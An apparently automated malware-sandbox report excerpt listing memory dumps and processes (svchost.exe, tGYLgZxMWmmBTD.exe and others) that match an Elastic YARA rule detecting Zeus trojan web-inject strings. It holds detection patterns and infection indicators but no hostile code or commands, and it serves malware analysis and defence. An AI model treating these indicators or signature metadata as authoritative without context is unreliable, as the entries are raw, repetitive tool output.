    Source: 2.3.svchost.exe.2c70000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1788047378.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1896507148.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1937495676.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1892490476.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1808599127.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1910755217.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1888344420.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1917963207.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1751304205.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931351798.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931013445.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931983270.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1899806491.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1918926192.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1819482254.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1898993550.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1900285726.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1875983940.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1932199583.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1891958770.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1918440128.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1887697552.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Matched rule: Windows_Trojan_Zeus_e51c60d7 (reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04). The rule matched in each of the following sources:
    Source: 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
    Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000003.1892177129.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000003.1885549848.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000003.1893840816.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000003.1755207141.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000002.00000003.1936460278.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTR
    Source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7376, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7352, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7328, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7304, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7280, type: MEMORYSTR
